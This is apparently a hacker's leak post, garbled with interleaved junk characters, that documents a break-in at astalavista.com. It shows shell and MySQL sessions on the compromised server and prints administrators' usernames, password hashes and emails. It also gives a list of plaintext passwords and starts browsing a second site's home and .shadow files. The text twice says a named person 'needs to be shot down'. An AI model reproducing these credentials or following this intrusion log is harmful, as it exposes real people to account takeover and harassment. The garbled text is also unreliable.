. f% m0 n w- y% x; v2 B) g<rss version=”2.0″>8 L( |; v6 T9 C) D7 z9 Q
<channel>
0 C" \" ~$ m# _; i6 F <title>ASTALAVISTA.com - Exploits</title>
1 D$ i$ g$ u' }1 K/ @" d& M <link>http://www.astalavista.com/exploits</link>
( M: C' f; y8 Z3 R9 n Q: Y, u8 E" m4 E <description>All availably Exploits.</description>( N; c4 I" f3 k% @! o# F) Z# J& O
<language>en-us</language>' v5 k; p6 R3 L$ K) I# y
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
; E/ c6 ?; [# X7 g- v3 X) O <docs>http://blogs.law.harvard.edu/tech/rss</docs>* F6 _: V f' \( y$ ~, [7 e
<generator>Astalavista.com</generator>
. o) R9 p+ {) T <webMaster>info@astalavista.com</webMaster>’ . $items . ‘3 j, S+ t8 u/ a# m$ j; m# f6 h4 q
</channel>
9 X, q7 ?' v! `) u4 B</rss>’;
8 {2 t, L9 s9 C1 z
1 L* p. L/ ` f% r% F: F; g# i if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {! U& p( s; w7 e% i
unlink (FULLPATH . ‘/feed/exploits.xml’);) K2 Z2 e# ^5 u& s/ f+ ~( k
}
1 |4 _ m$ h! H' X$ D, e0 Y
2 A v3 F' ?; ^4 D file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);) ~$ _! ]5 {% [7 ^ C$ e9 f
[snip]( b: I* ~( i! ^" b/ l2 v& Z
4 ~: }( W- P- i6 K3 ]* a
sh-3.2$ cat exploits.sh% q' J W# ]7 j5 k% R1 |2 d5 e
#!/bin/sh
3 r* ^2 x" U2 o( \+ k# r8 X" d: Y
% F+ I* F) q6 n' g# c, U l9 ^###########################################################
+ P8 m4 s, C- s; C# #; R6 r4 B% P! J
# Title: milw0rm exploits adder #/ V3 ?5 R. m% ~4 X( ^* A
# Description: Add all milw0rm exploits to the #& m2 w! A5 \. z* d
# Astalavista.com database #
7 g9 u8 J' G8 ?' a/ j& ]# #9 B# k/ g8 C" o4 c C) ^- i9 o
# Company: Astalavista Group #7 L E8 p+ E% `3 S8 \; D2 i; m9 @ N
# Author: Paulo M. Santos #
- E M& \" O$ n" r% p1 C: D# E-Mail: 链接标记paulo.santos@astalavista.ch #7 \) D+ ~6 U8 x5 w6 m. ?
# #
$ d: r# k9 s, a/ o0 d###########################################################
- [, J4 d4 _1 U2 e& f* m
6 k8 O' g9 E; O# path
$ Y; a) x$ s2 C3 z0 qthis_path=/home/com/public_html/modifications/cronjobs1 H& Z3 V1 ~. U" T* K5 [* R- X3 k5 ]
* r7 N3 K& T# U
# change directory* g* S* a7 ~3 h3 i+ d
cd $this_path
( M3 ^/ f, u8 k8 e" |4 ncd tmp/
^8 |/ J7 n, @. f ~& b6 @# L2 \ b' f9 |5 O
# delete files3 {/ u6 f% K2 \2 i! J& S' A
rm -rf milw0rm.tar.* &
" N# H% H: Q0 \( h6 P8 e6 yrm -rf milw0rm/ &' J" ?! q3 T v/ Q: Q
1 P$ ~+ r$ N* r. U% t8 L# wget milw0rm paket
- `; J3 |; I* R! l8 xwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
" |& d* l: l- D3 }. n% L! Q5 c( K" S% [
# extract milw0rm paket
- Q2 y, c0 y) }4 Ptar -xvf milw0rm.tar.bz2. X H9 y& E! ?7 `; p( m8 l
3 I2 c* h/ b. W
# change owner: T4 M% C0 `9 ^
chown -R com .3 Y) u9 f! \8 [ N2 F9 B& a
chgrp -R com .5 Y r1 A$ M6 |: L$ [; D
( Z8 Q& [7 T5 u! D* t1 D# execute php script5 ?% B0 O! ?- s5 X7 X2 i
cd $this_path
?" K9 z2 W. `/ d% s8 ]( ]php -q exploits.php
5 P: C, ]1 N2 C# O+ x+ N" \# w7 l+ ]2 e) x
# delete files
( U7 Q$ G+ w0 L Xrm -rf tmp/milw0rm.tar.*& }) i, L/ u/ R8 S; @% O1 D
rm -rf tmp/milw0rm/: |0 ]$ G5 ~+ W# N: s5 Y& D
: M- @9 o0 E# b& R/ e
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”6 m& g0 F* E' G0 _6 w( p$ R: C
Paulo M. Santos needs to be shot down.- p2 {; J$ N- \6 T! W
1 f2 Y) U" G$ m
mysql -u contrexxuser2 -p! T" R) K' N0 X3 ]$ ]
Enter password:
7 X: d( y# X2 T% MWelcome to the MySQL monitor. Commands end with ; or \g.
1 G$ x- ^* |: E' C3 l+ ZYour MySQL connection id is 261694
' a' i$ Q) J! j4 ]+ I& wServer version: 5.0.45-community-log MySQL Community Edition (GPL); H2 U# K- H+ b$ I& J3 v
1 C0 j# P5 x8 QType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
) C. R' S" _+ B5 z+ ^
# n" a! d( Q, F5 jmysql> show databases;- A: V& d) e/ r/ q4 q0 I. a k
+——————–+1 I, ^8 E' A2 J6 t0 _% J
| Database |
: e, I0 Y3 A7 D+——————–+; ~/ V( Y2 F9 Y7 N6 a1 A% F
| information_schema |
3 B5 e( B* Q! E| com_contrexx2 | [! t" w# a% j4 \# C
| com_contrexx2_live |, i& f3 W7 z M0 g# F
| test |
; u3 J7 {& F& J0 U P: B+——————–+
0 _( L$ C7 z5 ]8 g4 rows in set (0.00 sec)
- s7 y/ L3 {0 I* I0 P& M* X7 z* y! o4 \5 P) `: }0 s% [+ G" v( d- R
mysql> use com_contrexx2_live
6 R2 L! x( | k1 K9 N7 lDatabase changed
) P& Z8 I2 \1 S$ xmysql> show tables;
9 C4 M; ]) X& Y$ T% h+————————————————–+8 K1 E$ Z: Q! m9 h" I6 X* S A; @
| Tables_in_com_contrexx2_live |/ K6 z t% j, S8 L: M6 h
+————————————————–+6 X$ ]1 ?5 u: y/ ?# x
| cc_banner_counter |
/ h- M q" m8 i) ?5 K% W1 P| cc_search_counter |5 T& M- z* ~1 H4 M) W# a
| contrexx_access_group_dynamic_ids |
+ q1 @4 e4 q$ R" O L' ]& o% R| contrexx_access_group_static_ids |5 U8 R, R( e: }& m6 |) M
| contrexx_access_rel_user_group |
1 d3 K& [6 R% [# T2 F" D% V| contrexx_access_settings |( c( F( g; Z: x0 D- ]3 V# V- }
| contrexx_access_user_attribute |
' i' x( p {4 j; z| contrexx_access_user_attribute_name |
7 x+ k9 |4 O& A1 m/ Q| contrexx_access_user_attribute_value |9 ~4 _4 P4 j4 o! Q
| contrexx_access_user_core_attribute |1 U( |1 n: q! v, u0 e5 M9 ]
| contrexx_access_user_groups |
W- q; Y, e# ^+ {0 m9 y| contrexx_access_user_mail |
- Q: H B: Z4 x3 {. F0 e| contrexx_access_user_profile |& o& d# g! s" O- r0 @3 z% V
| contrexx_access_user_title |5 t( t3 I) i, n- ?" h/ |2 d
| contrexx_access_user_validity |" u/ p: q: g2 {! H+ G. v; Y$ g9 K
| contrexx_access_users |3 `3 `" d% N8 W
| contrexx_backend_areas |+ ^9 m$ F* O$ {! j5 ]4 }/ p% N
| contrexx_backups |
+ w7 W: T2 l" j7 w0 h| contrexx_content |
b9 v: F6 h% @2 i( i| contrexx_content_history |; }; k1 M/ t2 W) ?; H' p0 n
| contrexx_content_logfile |
) n% e) w2 ?6 u0 O| contrexx_content_navigation |
# i3 s/ r o p6 k| contrexx_content_navigation_history |- z' ]0 ^+ X; L1 t
| contrexx_ids |
$ y7 t+ g0 l5 I2 w% j* m( x m4 V2 g| contrexx_languages |
6 S% |, \0 d: y, B| contrexx_lib_country |
$ r. I1 K- h7 J. ~7 ~% D| contrexx_log |0 g: r; T/ r9 U! e$ Y8 N+ @
| contrexx_module_alias_source |
+ a1 E" p" _" || contrexx_module_alias_target |
$ \+ ~2 t5 D( z1 o1 a7 ]2 ^- w| contrexx_module_block_blocks |
9 T, C: A* O% k3 g, `# C| contrexx_module_block_rel_lang |+ h3 q" x* n+ l# b* e* F/ F" W
| contrexx_module_block_rel_pages |8 c( h u. F% r
| contrexx_module_block_settings |
7 o+ l8 @# M2 z7 p| contrexx_module_blog_categories |
: p7 `8 ^- @. {8 r0 U2 I& k| contrexx_module_blog_comments |
5 M: R% z) w: P% G: u0 S| contrexx_module_blog_message_to_category |
% p1 S2 x l0 ^' U6 A0 J| contrexx_module_blog_messages |& ?0 K6 c9 Y" X+ M8 @
| contrexx_module_blog_messages_lang |! ?; Z! D. E+ v
| contrexx_module_blog_networks |$ E! u3 ~: [6 ?5 x% L
| contrexx_module_blog_networks_lang |5 ~8 K! D W- v7 s
| contrexx_module_blog_settings |
z5 D& B* Y: z) b; Q$ u| contrexx_module_blog_votes |. U0 }. ]/ m; `: W9 W. H+ _' Q* c
| contrexx_module_calendar |1 U4 O: q1 N: `4 w; a
| contrexx_module_calendar_access |9 T# f# D: V9 G N$ X
| contrexx_module_calendar_categories |
. s: X7 T* R( m; S| contrexx_module_calendar_form_data |- n$ ?+ r9 J4 w5 K0 e! M! h
| contrexx_module_calendar_form_fields |
0 V9 X$ z& T5 q3 g2 |" y) @3 L| contrexx_module_calendar_registrations |0 ]9 \* i) U6 c
| contrexx_module_calendar_settings |
, c1 @& U: r! j$ D% w| contrexx_module_calendar_style |
2 ~% H: G* }3 c$ {| contrexx_module_contact_form |
( I/ q8 Y" w. c Y| contrexx_module_contact_form_data |% \4 H0 |* f, t% Z
| contrexx_module_contact_form_field |
6 w2 Q! [3 C/ R/ a y1 `| contrexx_module_contact_settings |! H% _% A; x5 V9 ~. W4 W' S4 Q
| contrexx_module_data_categories |
5 A0 z4 J% A) n; [| contrexx_module_data_message_to_category |
; _1 u, n0 o( Q# ~# i( x| contrexx_module_data_messages |% b! Y4 S( ]- ^- o
| contrexx_module_data_messages_lang |
+ z2 d! G2 E# Y2 b: f6 w| contrexx_module_data_placeholders |6 G& w/ s2 q, @+ c( B* t1 I5 H
| contrexx_module_data_settings |
' |- E/ e" [0 c I' z% @5 K w| contrexx_module_directory_access |
* m0 c. `( z1 H0 y9 ]$ f* U7 t( p9 J| contrexx_module_directory_categories |0 B4 Y- M# g6 N1 p% Q
| contrexx_module_directory_dir |
# d! i7 t& ~# t: i| contrexx_module_directory_inputfields |
# ]. z( J* ]! O| contrexx_module_directory_levels |- u$ f. j/ x6 s4 R
| contrexx_module_directory_mail |0 Z7 d0 r, m# _+ a) S
| contrexx_module_directory_rel_dir_cat |% I& c& E( k1 K3 v5 n9 n
| contrexx_module_directory_rel_dir_level |
7 m" [5 T* I* b1 h5 F- I- _& V| contrexx_module_directory_settings |
+ Q1 A6 M. z2 ]+ G2 a& l| contrexx_module_directory_settings_google |# l* z4 k- V; S( Z2 H( c: \; k
| contrexx_module_directory_vote |
, |9 G4 ~: _1 P: x% E" y7 D; g6 j+ l| contrexx_module_docsys |
) D1 q/ G8 {5 B! I+ R3 ]| contrexx_module_docsys_categories |
& m; C8 ]8 J0 Y' D K$ k3 X$ a| contrexx_module_egov_configuration |
% G, V- v0 G+ O" J| contrexx_module_egov_orders |
) M" t P$ G9 _& L7 A| contrexx_module_egov_product_calendar |
0 i- W% g0 Y0 F2 \) Y7 y4 j9 b- K8 w| contrexx_module_egov_product_fields |
* j3 S5 c* ]5 m) m5 t| contrexx_module_egov_products |! y; J+ N+ y5 y8 \+ E
| contrexx_module_egov_settings |$ H E$ T, [% o3 Z% \
| contrexx_module_exploits |- k6 S( ^* g; T H M1 H; u
| contrexx_module_exploits_categories |
( g2 @& G# w5 F, x| contrexx_module_feed_category |: O! u0 S# j3 _, `
| contrexx_module_feed_news |5 p7 d7 f% A; F5 L) p
| contrexx_module_feed_newsml_association |: n3 Z3 B x) b2 k4 @
| contrexx_module_feed_newsml_categories |# l/ K: i' C# r/ V
| contrexx_module_feed_newsml_documents |
4 Z; W4 }. Y0 n* f U| contrexx_module_feed_newsml_providers |: o) g' b4 G8 c6 \
| contrexx_module_forum_access |
0 B. b* q7 N4 |2 ]| contrexx_module_forum_categories |/ M) H F i; l# T4 I
| contrexx_module_forum_categories_lang |$ R/ e. e S8 B/ g- A
| contrexx_module_forum_notification | m j0 Y. [- n/ J: g( {
| contrexx_module_forum_postings | H( `' d( l- x
| contrexx_module_forum_rating |
, I5 T; k! G @8 v! _3 _7 t# p% ^| contrexx_module_forum_settings |
8 z' T- W9 a8 |7 @- [; o; n| contrexx_module_forum_statistics |
) A: w- M A6 t1 }/ N| contrexx_module_gallery_categories |
2 H; Z# `" [ Y5 X+ ]| contrexx_module_gallery_comments |
. X* K$ e% `. h: g' _; b0 ^; d" \ {| contrexx_module_gallery_language |+ d& N: r* b [0 _3 w
| contrexx_module_gallery_language_pics |9 u( k* W7 c8 ^) U4 P
| contrexx_module_gallery_pictures |
9 @6 R' @& t1 J| contrexx_module_gallery_settings |
l5 C" q9 v" X7 f, D/ h) i| contrexx_module_gallery_votes |
0 U2 U N2 K- R7 }- `| contrexx_module_guestbook |
; ^: p- |" X, H$ Y; ~' _| contrexx_module_guestbook_settings |9 d1 S. k( L. |
| contrexx_module_livecam |9 c; V# ?8 Y4 j0 [
| contrexx_module_livecam_settings |
4 v9 V+ @$ P: f0 w| contrexx_module_market |, ?5 p9 T& {# q8 P+ _: ~* L0 `
| contrexx_module_market_access |
3 s2 Y4 _: r u$ i4 _- r| contrexx_module_market_categories |2 {+ _* Q; \+ u6 o1 m4 q" R
| contrexx_module_market_mail |
4 u$ w2 d5 ?3 G( k| contrexx_module_market_paypal |8 f& H9 X9 P1 j* T x
| contrexx_module_market_settings |
/ P5 y/ A/ S) k1 c) f0 \, j| contrexx_module_market_spez_fields |
* X' @( n! l; V5 L$ l) `| contrexx_module_mediadir_access |
, o! F0 o1 j6 I1 Z3 H; R| contrexx_module_mediadir_categories |
& s. Z* R& _/ F8 ]6 W" l& _| contrexx_module_mediadir_comments |! R. i/ q" X) {- o$ c" K
| contrexx_module_mediadir_dir |9 c) h+ M/ n" W6 a7 P! A6 s
| contrexx_module_mediadir_inputfields |
/ l1 J& T% T' ^6 v' c9 F T/ I| contrexx_module_mediadir_levels |
- Y* T: B& k e- I) W* i| contrexx_module_mediadir_mail |
" P) z0 C O ^1 Z| contrexx_module_mediadir_rel_dir_cat |4 P4 B" _6 k2 O P; @
| contrexx_module_mediadir_rel_dir_level |
- u1 s6 X6 t; r: l( B1 ]0 U| contrexx_module_mediadir_reports |
% Q2 d# s$ g- Y$ w: I& U| contrexx_module_mediadir_settings |( F+ Z M; r7 {9 Q
| contrexx_module_mediadir_settings_google |/ R' n, T* K8 y# l$ M& F
| contrexx_module_mediadir_vote |
9 i: j! I6 T5 w9 x- \| contrexx_module_memberdir_directories |
! {: Y5 u9 ~4 Y( x& S| contrexx_module_memberdir_name |
2 f2 } _/ D U r| contrexx_module_memberdir_settings |
7 A# K3 x' N! J4 [7 \| contrexx_module_memberdir_values |1 |, `! g8 `# ^3 z+ }8 j
| contrexx_module_nettools_allowed_groups |) y& d' m p$ @2 K8 N, E
| contrexx_module_nettools_settings |! m& Z! E8 J1 S6 ]3 C( [, u9 O
| contrexx_module_news |
9 L/ e+ O# g, A- W S% i/ `- G| contrexx_module_news_access |8 h0 n" S5 {9 ^$ d7 }* ?
| contrexx_module_news_categories |0 f* j; \( J; B2 c: H9 w3 e0 W# \
| contrexx_module_news_settings |" ~$ w" {+ E) H% b( ` @# e
| contrexx_module_news_teaser_frame |
# y G `6 M' `/ l+ d9 w5 ?9 `0 [| contrexx_module_news_teaser_frame_templates |
+ Q' I9 S9 ?/ `" r r; m| contrexx_module_news_ticker |6 `4 v7 L9 _. ?& |1 c+ u: D \
| contrexx_module_newsletter | J# Y' k, o' C) I- |+ Q
| contrexx_module_newsletter_attachment |
8 Z6 D) B" d3 W( O| contrexx_module_newsletter_category |
. M; ^8 ^7 Z' P/ Z3 H5 @| contrexx_module_newsletter_confirm_mail |
* y3 a, M& b& ^5 X7 ?2 X2 ~| contrexx_module_newsletter_rel_cat_news |+ ^; b9 k/ f4 j, L. J% w) t( H
| contrexx_module_newsletter_rel_user_cat |. A( t1 @+ t4 H5 k
| contrexx_module_newsletter_settings |4 ?# o1 @0 x! E: U9 ]" M# X( d
| contrexx_module_newsletter_template |
& M; E! w6 k8 R* m| contrexx_module_newsletter_tmp_sending |3 R+ Y0 e* o7 \% D3 L* U3 i' N
| contrexx_module_newsletter_user |9 x6 O: |- F) h% U2 N
| contrexx_module_newsletter_user_title |
; e, F! B" E+ x| contrexx_module_onlinetools_defaultports |
! I# j* |3 d/ ]* w3 w5 i| contrexx_module_onlinetools_defaultports_back |
& |& W+ i" M' ~. Y7 x) U ?; M| contrexx_module_onlinetools_geolitecity_blocks |9 i# X4 J7 w0 y# P# D+ j% g- v
| contrexx_module_onlinetools_geolitecity_country |/ W% S6 I5 C+ O/ F
| contrexx_module_onlinetools_geolitecity_location |% }% c. h: B; m6 a- V
| contrexx_module_podcast_category |' N/ g. a3 W2 u/ z. a' S- N, p' ?
| contrexx_module_podcast_medium |
" I( d$ j, i e5 K+ T: {* H1 F| contrexx_module_podcast_rel_category_lang |
9 L! T0 ]; y a9 K# W8 r. G) B| contrexx_module_podcast_rel_medium_category |" o. v& w4 U9 X7 g$ a, h
| contrexx_module_podcast_settings |! w5 l; ^8 u9 ?! q5 r: s2 s+ T. y
| contrexx_module_podcast_template |
, D; ~- u8 ^! E6 D; l+ v| contrexx_module_proxydb |
7 _( W5 k% d p2 L8 k* t% I+ ]| contrexx_module_recommend |' y) [( L* I" i0 S. z, `* r
| contrexx_module_repository |
& X& ^9 X% z+ c' ~' N" |% g. H, N| contrexx_module_securitynews_cats |
3 c+ t* f! x& U| contrexx_module_securitynews_feeds |9 c5 u8 T$ r! S+ I8 U
| contrexx_module_securitynews_news |
8 I) P! m9 l) K. D| contrexx_module_shop_categories |
^$ y7 U0 E0 N: w2 d: a( }' Z* m| contrexx_module_shop_config |
( ~6 `5 w( N' N' D| contrexx_module_shop_countries |8 P7 z" }1 W( e
| contrexx_module_shop_currencies |
1 |8 b0 q6 y0 Z# Z: f| contrexx_module_shop_customers |
5 I e, D! V' A6 |% c+ S| contrexx_module_shop_importimg |: h: N7 k6 C, j& R5 |
| contrexx_module_shop_lsv |
/ c" F8 e- p$ s| contrexx_module_shop_mail |" f* t) t6 B9 x( M' V8 O
| contrexx_module_shop_mail_content |) ]% j% Z/ L7 N, G8 ~8 @' p
| contrexx_module_shop_manufacturer |/ D3 B* r. V- l" `( K5 h) ^1 F
| contrexx_module_shop_order_items |4 |* i( c( _2 N/ {; X
| contrexx_module_shop_order_items_attributes |: g; b/ L) j- g6 e
| contrexx_module_shop_orders |
# h" F0 M R# A( G$ h6 i6 m| contrexx_module_shop_payment |
' Y( M0 J7 P, b$ K! ~( I| contrexx_module_shop_payment_processors |1 @/ i B$ {$ C3 x6 E
| contrexx_module_shop_pricelists |& s/ B$ M. W" E- K! G: s
| contrexx_module_shop_products |- D1 `( g9 ]8 r1 Q( b- D
| contrexx_module_shop_products_attributes |+ N' A4 D9 z) j- m; f/ Z8 ]
| contrexx_module_shop_products_attributes_name |: r% _4 M. \6 f. h. d: u
| contrexx_module_shop_products_attributes_value |
) t* a0 V# A: E0 X| contrexx_module_shop_products_downloads |# r" h$ A% w2 h2 P" Z, d1 T0 [
| contrexx_module_shop_rel_countries |% s/ B) T; a( ^: O; m
| contrexx_module_shop_rel_payment |
& v( j# y% N; \+ ?| contrexx_module_shop_rel_shipment |, ^$ W9 G, f0 r; F8 {
| contrexx_module_shop_shipment_cost |$ w" @4 o4 f( u
| contrexx_module_shop_shipper |; ]5 v+ Y8 h$ Z( E D& N
| contrexx_module_shop_vat |7 r- o9 f2 f4 u+ k' p
| contrexx_module_shop_zones |
1 f8 U K5 Q8 ~% P| contrexx_module_u2u_address_list |
! T. T" g( e% T% {( w2 q0 C| contrexx_module_u2u_message_log |
, ^# l1 q" T( {; \3 c' R* ?% J| contrexx_module_u2u_sent_messages |) \( u9 E3 q y$ D
| contrexx_module_u2u_settings |
5 ~; }# q- N, c7 I9 u* q! g| contrexx_module_u2u_user_log |
; F6 B. W _* g: ~' ^4 C) W| contrexx_modules |
& }3 f ~/ k% @/ u| contrexx_sessions |
6 \0 e5 e7 k& d9 X' x6 T" J* X| contrexx_settings |) J" j" L6 w% q& B
| contrexx_settings_smtp |$ N( }, k; U; s. e b
| contrexx_skins |4 E+ }% ~- [* W) G
| contrexx_stats_browser | }' y4 g' Q! C; V9 n' ^ }
| contrexx_stats_colourdepth |
9 c6 D' `9 v* ^0 {5 F) C| contrexx_stats_config |
9 k. I# V& }& D- }- T4 a| contrexx_stats_country |. V6 o5 l+ ~, t
| contrexx_stats_hostname |2 w; a% u4 Z9 Z: c/ g! \0 z7 q
| contrexx_stats_javascript |* }( Y# n6 S% B, X4 V
| contrexx_stats_operatingsystem |
2 F3 \! _$ \/ p- P% z( Y| contrexx_stats_referer |
, D- H/ [3 I" {3 N! F2 f$ c| contrexx_stats_requests |5 A6 K( m& ]0 f3 s
| contrexx_stats_requests_summary |
% V/ ]* Y9 c: c- }| contrexx_stats_screenresolution |+ t5 @& r0 G) ^1 K1 o( M7 s
| contrexx_stats_search |7 {0 Q9 P1 @0 |1 B% J
| contrexx_stats_spiders |& ?, j3 ~5 h2 u, s: K) m# X4 U
| contrexx_stats_spiders_summary |
$ b% w ]4 T1 n& F| contrexx_stats_visitors |
S" Z* S2 M/ p) N# R| contrexx_stats_visitors_summary |( R: t& k& I2 ]6 j
| contrexx_voting_additionaldata |& j* B* |+ |4 L! Q, `
| contrexx_voting_email |- H: a* R/ g B! m2 X
| contrexx_voting_rel_email_system |
8 E% d% `% ^( o: s| contrexx_voting_results |2 c" `, O$ D }" _/ {9 S
| contrexx_voting_system |0 n7 h, j$ m$ ?# @" v
| foo |5 n1 e- W) F( W6 f( e) c! J5 }
+————————————————–+
# \0 ?; m( w" a5 G9 u5 Z( f227 rows in set (0.01 sec)
( d" t0 m9 N/ N' S- \4 r* S
7 W4 }- o4 @. C: F R9 t2 Nmysql> select count(*) as skids from contrexx_access_users;
; C# y g- J% a* T C$ F9 Y7 @+——-+
5 r0 G% a: @9 E2 E% P! V+ X- i A| skids |0 O2 i7 Q) n% [
+——-+
H: |7 O& D4 m! B- Q| 53699 |9 q7 U0 D) G* Q9 B- P
+——-+/ [1 r7 J4 q* z3 @" i
1 row in set (0.00 sec)
/ D, ~/ P" r" }/ ~
$ X6 a! }: l/ |$ j) Emysql> describe contrexx_access_users;4 I' A4 X+ G3 U0 W+ [/ {, H
+——————+——————————————+——+—–+————–+—————-+/ w! R( N. {% C _1 F( B
| Field | Type | Null | Key | Default | Extra |: E3 }1 h; V2 u9 P* D) S% N) n+ W
+——————+——————————————+——+—–+————–+—————-+( a0 x' H( B/ {3 W) C/ W6 k
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
0 O. M9 f% l- w5 ?5 g| is_admin | tinyint(1) unsigned | NO | | 0 | |
' i, M0 K: q/ |- f$ c- i| username | varchar(40) | YES | MUL | NULL | |
8 X) N4 f: C _, H) e; o| password | varchar(32) | YES | | NULL | |
0 l. B8 I' z# b| regdate | int(14) unsigned | NO | | 0 | |
! A8 U, Z4 K+ [( v& A3 L; v| expiration | int(14) unsigned | NO | | 0 | |; M$ F; W( }5 ^/ Y2 q
| validity | int(10) unsigned | NO | | 0 | |; e& O" U; x$ l: D: J
| last_auth | int(14) unsigned | NO | | 0 | | \5 \) F1 c5 x* ~$ @" ~6 C! ~* [4 J
| last_activity | int(14) unsigned | NO | | 0 | |
1 E2 D- \8 M1 R# ^| email | varchar(255) | YES | | NULL | |
% T8 s- o8 H: w2 T. B| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |2 V8 d6 z+ f3 V" B
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
q/ t; U* p2 j T* o| backend_lang_id | int(2) unsigned | NO | | 0 | |4 ^9 N1 {) I& s+ ]' z/ v
| active | tinyint(1) | NO | | 0 | |
9 @9 J- r2 y6 j| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |; {" g! _- w1 W
| restore_key | varchar(32) | NO | | | | C+ Y0 ^ O' j/ x1 W
| restore_key_time | int(14) unsigned | NO | | 0 | |; M& T5 F% c, j: Z0 W4 C0 f
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
9 Z; p# i- w# P9 L3 @, h& ^6 m+——————+——————————————+——+—–+————–+—————-+3 J6 M D) R1 T" c( w: R; t. Z
18 rows in set (0.00 sec)
0 l+ ~* T8 u: D" g6 Q6 z4 ~$ [. G7 M
mysql> select username,password,email from contrexx_access_users where is_admin = 1;# L& N% U6 h) P5 x9 E
+————+———————————-+—————————–+3 o2 S7 a2 }4 c# o* \
| username | password | email |
) H! l+ }' \& C+ v* ? W+————+———————————-+—————————–+5 i7 V$ K) e. ]) t
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |5 S0 k2 E. ?% t4 B0 L# ^7 i
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |+ o4 N3 E1 q3 u, w1 G
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
, d. o2 } Z1 \) B( O| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |8 a$ J# t/ X Q+ A0 L$ k# y* I+ V( ?
+————+———————————-+—————————–+
) X" T. E* l8 M+ t* q4 rows in set (0.04 sec)
( C' n6 j6 o( H. y% }
" z! z: V3 U+ Wmysql> exit;; f* s: @( s- t# c9 r5 l L8 y
Bye, z: m6 C1 Z/ }- l' Z! T- e3 t' m0 [
3 I* f$ y0 M: M; ?[~] There you go, your “team of security and IT professionals” is a joke.
- h) u) G5 d: v3 R
" q9 Q1 y% e6 D( `/ C+——————————+$ j4 k6 b/ J0 x
system:f82BN3+_* U$ a# E0 ]! ?& \
Be1er0ph0r:belerophor4astacom
$ F* |) O' }$ ?, s% e; z- Aprozac:asta4cms!, V4 J0 O$ q/ |* Z6 o$ g0 r, X
commander:mpbdaagf6m" o- o$ D: Y, }5 g8 v! [& ^
sykadul:ak29eral. }8 o2 w1 P2 J
+——————————+3 T( E: r$ [3 { E- O( x# z+ d
/ o4 V' O2 A+ o7 n; H3 M9 M[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
! y5 G( N( Q# |3 Z. N…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
7 H) F# B" i! o6 A% P* W f; z
9 T4 k9 F4 @: ^2 D4 L& i[~] Lets move to astalavista.net now,$ Q: O5 [8 ]3 a
1 {4 k: ]; ~ n. a# i- s1 cFrom <链接标记[url]https://www.astalavista.net/[/url]>:" G8 l6 Q3 M3 B) W9 N+ r
>> Everyone knows that the best defense is a good offense.
' Z# @6 j. I+ n- x+ ^6 c4 V>> Those who wait for their foes to find a security loophole are opting for the wrong strategy." S5 X \3 t9 H# z; C4 e) Y! z
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.: w5 z' T) {8 k: _' C, z
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
& w+ @* E3 P2 `; \2 r: D4 O
. G+ w1 ]4 a3 _) o, Z, H>> Go ahead, try and hack our server . in a completely legal way!
! w' H7 ^, S5 P3 c>> Learn by doing: We offer our members tricky tasks and challenges on an; a: [ G; ?3 W
>> ongoing basis so you can test your knowledge and abilities. You can also1 `: e: l8 `& Q4 C" ^: R' }
>> demonstrate what you.ve mastered by taking part in regular hacker contests- E+ U( ~3 ?3 o* h" |, U
>> and war games
! B2 Z6 t: y- F* C7 _( V5 G) c
5 j1 [% [& b4 T# L[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
4 V" o( z u8 j5 K, M! y6 r$ b6 |# l: R* ], y8 P+ V# `( b& Y6 n6 D2 ?
[-] Tricky task: Find home dir of astalavista.net$ M- @% H( u3 N7 S* D* S) W+ j
/ E* U4 ?, x$ Q& H! c1 `
sh-3.2$ ls -la ~astanet* \) [# W; {' l% I; X# d
total 484 R1 h) ?7 I4 D) p
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .6 X* J' j$ c0 {5 Z$ g: q x* R$ M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .." B( w1 @+ H( i- |8 q1 B; X
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
! k! @! y! P$ h& P7 \5 V ]8 g-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
0 }+ z6 g# @. Q5 v1 Q) x( E7 d-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
/ c1 Q% W+ |! E$ p" C" C# k! Z4 B# }-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
: K3 H G9 E# f-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc" x3 \# G F# V, y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains" H# `- V6 K4 Q# _! W7 O$ W# ]
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap* a# z5 A: ~5 H5 _: x( T9 C, W; k
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail3 K( g8 @ G& x- H4 j
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html" g9 a; `4 @4 K. G
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
3 o! D) i8 E, A& s. H, O4 V, D
1 A* Z9 A# R) S- g% I3 k* c9 Osh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/& o% v( G3 R7 O' ~9 E- F3 V
sh-3.2$ ls -la
7 \) r& o7 r8 S; K6 btotal 200
